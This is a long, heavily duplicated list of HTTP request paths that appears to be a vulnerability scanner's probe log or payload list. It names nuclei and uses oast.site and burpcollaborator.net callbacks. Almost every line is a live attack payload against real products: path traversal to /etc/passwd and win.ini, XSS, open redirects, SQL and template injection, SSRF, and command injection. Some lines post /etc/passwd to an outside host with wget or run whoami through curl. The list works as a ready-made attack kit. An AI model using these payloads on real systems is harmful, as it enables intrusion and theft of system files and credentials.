/web/api/geojson?url=file:///etc/passwd
/web/wlsecurity.html
/web/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/web/language/lang
/web/pandora_console/attachment/pandora_chat.log.json.txt
/web/cas/v1/tickets/
/web/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
/web/_ignition/execute-solution
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/labkey/__r1/login-login.view?returnUrl=http://example.com
/web/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/web/api/snapshots
/web/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/web/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/web/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
/web/plugin
/web/s/25Sm0Prbf5ZGPpABFxndCLbZfqr/_/;/WEB-INF/web.xml
/web/global-protect/login.esp?user=j%22;-alert(1)-%22x
/web/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/web/api/geojson?url=file:///etc/passwd
/web/wlsecurity.html
/web/language/lang
/web/index.php?v=d&p=%22;alert(document.domain);%22
/web/cas/v1/tickets/
/web/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/_ignition/execute-solution
/web/labkey/__r1/login-login.view?returnUrl=http://example.com
/web/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/web/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
/web/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/web/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/web/about/../tree?action=get
/web/BSW_cxttongr.htm
/web/autodiscover/autodiscover.json
/web/plugin
/web/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/web/_async/AsyncResponseService
/web/_ignition/execute-solution
/web/global-protect/login.esp?user=j%22;-alert(1)-%22x
/web/static/../../../a/../../../../etc/passwd
/web/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/web/dompdf.php?input_file=dompdf.php
/web/Config/SaveUploadedHotspotLogoFile
/web/login.action
/web/getFavicon?host=http://c8accf99m8v8l7afta3gcekccxayyyyyr.oast.site
/web
/web/checkValid
/web/cgi-bin/system_mgr.cgi?
/web/_ignition/execute-solution
/web/index.php?v=d&p=%22;alert(document.domain);%22
/web/getcfg.php
/web/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php
/web/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com
/web/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/web/autodiscover/autodiscover.json
/web/about/../tree?action=get
/web/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/web/BSW_cxttongr.htm
/web/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/web/_async/AsyncResponseService
/web/static/../../../a/../../../../etc/passwd
/web/getFavicon?host=http://c8accf99m8v8l7afta3gcekccxayyyyyr.oast.site
/web/login.action
/web/Config/SaveUploadedHotspotLogoFile
/web/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
/web/login?next=\\\example.com
/web/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/web?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/web/cgi-bin/system_mgr.cgi?
/web/checkValid
/web/homeaction.php
/web/_ignition/execute-solution
/web
/web/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/Assets/temp/hotspot/img/logohotspot.txt
/web/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://c8accf99m8v8l7afta3gcekccoeyyyyyq.oast.site
/web/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net
/web/html/device-id
\..\..\..\..\Windows\win.ini
/web/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
/web/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget
/web/_fragment?_path=_controller=phpcredits&flag=-1
/web/wp-admin/admin-ajax.php?action=c992ed7b44435ca30d8b79ff8b63a477
/web/_ignition/execute-solution
/web/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com
/web/img.php?f=/./etc/./passwd
/web/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x
/web/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php
/web/system/deviceInfo?auth=YWRtaW46MTEK
/web/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>
/web/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/web/wp-admin/admin-ajax.php?action=0158228b8100449b0d3152687f07370b
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/index.php?page_slug=../../../../../etc/passwd%00
/web/lib/dompdf/dompdf.php?input_file=dompdf.php
/web/_ignition/execute-solution
/web/admin/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>
/web/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/web/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/web/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/web/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
/web/login?next=\\\example.com
/web/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/web/webadmin/auth/verification.php
/web?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/web/Assets/temp/hotspot/img/logohotspot.txt
/web/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net
/web/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://c8accf99m8v8l7afta3gcekccoeyyyyyq.oast.site
/web/artifactory/ui/auth/login?_spring_security_remember_me=false
/web/redfish/v1/SessionService/Sessions/
/web/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/dfsms/
/web/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
/web/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/web/XMLCHART
/web/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x
/web/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/web/system/deviceInfo?auth=YWRtaW46MTEK
/web/wp-admin/admin-ajax.php?action=0158228b8100449b0d3152687f07370b
/web/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?page_slug=../../../../../etc/passwd%00
/web/lib/dompdf/dompdf.php?input_file=dompdf.php
/web/_ignition/execute-solution
/web/admin/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>
/web/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/web/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/run
/web/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/web/
/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)
/web/appGet.cgi?hook=get_cfg_clientlist()
/web/
/web/version.web
/web/includes/dompdf/dompdf.php?input_file=dompdf.php
/web/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/web/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/web/jolokia/read/getDiagnosticOptions
/web/wp-content/plugins/contact-form-7/readme.txt
/web/dfsms/
/web/redfish/v1/SessionService/Sessions/
/web/artifactory/ui/auth/login?_spring_security_remember_me=false
/web/_ignition/execute-solution
/web/XMLCHART
/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/25Sm0P31pYRyYWxZzEoXDL2NItg/);marmoset.embed(%27a
/web/run
/web/includes/dompdf/dompdf.php?input_file=dompdf.php
/web/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/jolokia/read/getDiagnosticOptions
/web/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/web/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/contact-form-7/readme.txt
/web/goform/setmac
/web/appGet.cgi?hook=get_cfg_clientlist()
/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)
/web/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/web/version.web
/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/25Sm0P31pYRyYWxZzEoXDL2NItg/);marmoset.embed(%27a
/web/Autodiscover/Autodiscover.xml
/web/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
/web/XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri
/web/api/v1/login/oauth2/auth
/web/_ignition/execute-solution
/web/login/
/web/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/web/secure/QueryComponent!Default.jspa
/web/_bulk
/web/rest/v1/AccountService/Accounts
/web/phpmyadmin/
/web/ucmdb-api/connect
/web/goform/setmac
/web/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/web/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/web/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/web//www.example.com
/web/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
/web/Autodiscover/Autodiscover.xml
/web/druid/indexer/v1/sampler
/web/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/web/__
/web/secure/QueryComponent!Default.jspa
/web/XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri
/web//www.example.com
/web/api/v1/login/oauth2/auth
/web/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/web/login/
/web/phpmyadmin/
/web/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/web/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/web/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/web/druid/indexer/v1/sampler
/web/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/web/_bulk
/web/ucmdb-api/connect
/web/__
/web/pme/database/pme/phinx.yml
/web/api/config
/web/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/web/wp-content/bps-backup/logs/db_backup_log.txt
/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
/web/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/web/error3?msg=30&data=';alert('nuclei');//
/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D
/web/community/?foro=signin&redirect_to=https://example.com/
/web/%252f%255cexample.com%252fa%253fb/
/web/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/graphql
/web/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/web/service/v1/service-details
/web/pme/database/pme/phinx.yml
/web/fw/mindex.do?url=./WEB-INF/web.xml%3f
/web/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
/web/wp-content/bps-backup/logs/db_backup_log.txt
/web/api/config
/web/error3?msg=30&data=';alert('nuclei');//
/web/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/web/reports/rwservlet/showenv
/web/secure/ContactAdministrators!default.jspa
/web/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/web/omni_success?cmdb_edit_path=");alert('nuclei');//
/web/?id=nuclei%25{128*128}
/web/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt
/web/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/web/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}
/web/community/?foro=signin&redirect_to=https://example.com/
/web/%252f%255cexample.com%252fa%253fb/
/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D
/web/user.action
/web/graphql
/web/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/web/config/getuser?index=0
/web/mailingupgrade.php
/web/index.php?page=/etc/passwd%00
/web/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/web/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld
/web/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/web/auth/newpassword
/web/service/v1/service-details
/web/fw/mindex.do?url=./WEB-INF/web.xml%3f
/web/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/web/wan.htm
/web/reports/rwservlet/showenv
/web/secure/ContactAdministrators!default.jspa
/web/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/web/cgi?2
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x
/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}
/web/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
/web/assets/php/upload.php
/web/external_content/retrieve/oembed?endpoint=http://c8accf99m8v8l7afta3gcekccuyyyyyy6.oast.site&url=foo
/web/assets/data/usrimg/25sm0eq6aegfmow97wzwtneqhaw.php
/web/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/web/user.action
/web/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd
/web/catalog.php?filename=../../../../../../../../../etc/passwd
/web/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/web/config/getuser?index=0
/web/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/web/mailingupgrade.php
/web/index.php?page=/etc/passwd%00
/web/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/web/auth/newpassword
/web/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld
/web/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/web/cgi-bin/supportInstaller
/web/wan.htm
/web/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/etc/passwd
/web/service/extdirect
/web/cgi?2
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x
/web/OA_HTML/lcmServiceController.jsp
/web/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld
/web/assets/data/usrimg/25sm0eq6aegfmow97wzwtneqhaw.php
/web/assets/app/something/services/AppModule.class/
/web/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
/web/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/web/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/web/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/web/s/25Sm076acOEUIv0qQcJQ6IyuUmy/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/cgi?7
/web
/web/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F
/web/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd
/web/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
/web/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/web/catalog.php?filename=../../../../../../../../../etc/passwd
/web/%u002e/WEB-INF/web.xml
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/web/wp-json/wp/v2/users/
/web/rest/tinymce/1/macro/preview
/web/.%00/WEB-INF/web.xml
/web/?rest_route=/wp/v2/users/
/web
/web/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/web/cgi-bin/supportInstaller
/web/os/mxperson
/web/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/secure/ViewUserHover.jspa
/web/index.php?sl=../../../../../../../etc/passwd%00
/web/cgi-bin/login?LD_DEBUG=files
/web/OA_HTML/lcmServiceController.jsp
/web/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
/web/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld
/web/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/assets/app/something/services/AppModule.class/
/web/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/
/web/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/web/index.php
/web/s/25Sm076acOEUIv0qQcJQ6IyuUmy/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/web/s/25Sm076acOEUIv0qQcJQ6IyuUmy/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/web/../../../../../../../../windows/win.ini
/web/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/api/get_device_details
/web/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/web/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F
/web/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
/web/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/web/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/web/scripts/setup.php
/web/rest/tinymce/1/macro/preview
/web/include/downmix.inc.php
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/uir//etc/passwd
/web/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/web
/web/ajax/api/content_infraction/getIndexableContent
/web/clients/editclient.php?id=25Sm0P4QHg73FKZWAASD6i3IqNx&action=update
/web/os/mxperson
/web/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/meaweb/os/mxperson
/web/ajax/networking/get_netcfg.php?iface=;curl%20http://c8accf99m8v8l7afta3gcekccuayyyybn.oast.site/`whoami`;
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/web/index.php
/web/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
/web/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/web/s/25Sm076acOEUIv0qQcJQ6IyuUmy/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/web/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/../../../../../../../../windows/win.ini
/web/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/web/awstats/awredir.pl?url=example.com
/web/api/jsonws/invoke
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web
/web/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/web/scripts/setup.php
/web/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/cgi-bin/status
/web/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
/web/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/ajax/api/content_infraction/getIndexableContent
/web/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
/web/uir//etc/passwd
/web/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-
/web/action/usermanager.htm
/web/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com
/web
/web/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
/web/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/web/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/.//WEB-INF/classes/META-INF/microprofile-config.properties
/web/jars/upload
/web/NateMail.php
/web/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/web/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/web/clients/editclient.php?id=25Sm0P4QHg73FKZWAASD6i3IqNx&action=update
/web/logos_clients/1.php
/web/meaweb/os/mxperson
/web/ajax/networking/get_netcfg.php?iface=;curl%20http://c8accf99m8v8l7afta3gcekccuayyyybn.oast.site/`whoami`;
/web/images/..%2finfo.html
/web/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/awstats/awredir.pl?url=example.com
/web/cgi-bin/awstats/awredir.pl?url=example.com
/web/api/jsonws/invoke
/web/api/jsonws/invoke
/web/cgi-bin/status
/web/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/web/cgi-bin/stats
/web/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users
/web/cgi-bin/test
/web/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
/web/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-
/web/action/usermanager.htm
/web/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com
/web/wp-admin/admin-ajax.php
/web/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/web/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-
/web/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
/web/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/jars/upload
/web/.//WEB-INF/classes/META-INF/microprofile-config.properties
/web/..../..../..../..../..../..../..../..../..../windows/win.ini
/web/wp-login.php
/web/Admin
/web/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/NateMail.php
/web/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/wp-content/plugins/wsecure/wsecure-config.php
/web/solr/admin/cores?wt=json
/web/kindeditor/php/demo.php
/web/index.php?redirect=/\/evil.com/
/web
/web/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/web/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/web/logos_clients/1.php
/web/api/experimental/latest_runs
/web/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?redirect=//evil.com
/web/pages/systemcall.php?command=cat%20/etc/passwd
/web/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://c8accf99m8v8l7afta3gcekccwoyyyybg.oast.site/
/web/api/jsonws/invoke
/web/cgi-bin/awstats/awredir.pl?url=example.com
/web/minio/webrpc
/web/actions/authenticate.php
/web/cgi-bin/test
/web/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/web/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
/web/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13
/web/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B
